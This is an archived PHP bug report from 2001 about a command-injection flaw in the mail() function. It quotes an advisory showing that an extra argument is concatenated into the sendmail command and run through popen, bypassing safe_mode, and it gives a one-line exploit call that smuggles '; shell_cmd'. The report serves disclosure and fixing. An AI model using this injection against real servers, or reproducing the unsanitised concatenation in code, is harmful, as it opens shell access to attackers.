ID: 12268
Updated by: rasmus
Reported By: [EMAIL PROTECTED]
Old Status: Open
Status: Closed
Bug Type: *Mail Related
Operating System: Any
PHP Version: 4.0.5
New Comment:
Fixed a while ago in CVS
Previous Comments:
------------------------------------------------------------------------
[2001-07-19 19:29:34] [EMAIL PROTECTED]
http://www.net-security.org/text/bugs/995534103,28541,.shtml:
PHP Mail Function Vulnerability
Posted on 19.7.2001
php mail() function does not do check for escape shell commandes, even if
php is running in safe_mode.
So it's may be possible to bypass the safe_mode restriction and gain shell
access.
Affected:
php4.0.6
php4.0.5
Significatives lines of ext/standard/mail.c:
>extra_cmd = (*argv[4])->value.str.val;
>strcat (sendmail_cmd, extra_cmd);
>sendmail = popen(sendmail_cmd, "w");
Exploit:
mail("[EMAIL PROTECTED]",
"test",
"test",
"test", "; shell_cmd");
------------------------------------------------------------------------
Edit this bug report at http://bugs.php.net/?id=12268&edit=1
--
PHP Development Mailing List <http://www.php.net/>
To unsubscribe, e-mail: [EMAIL PROTECTED]
For additional commands, e-mail: [EMAIL PROTECTED]
To contact the list administrators, e-mail: [EMAIL PROTECTED]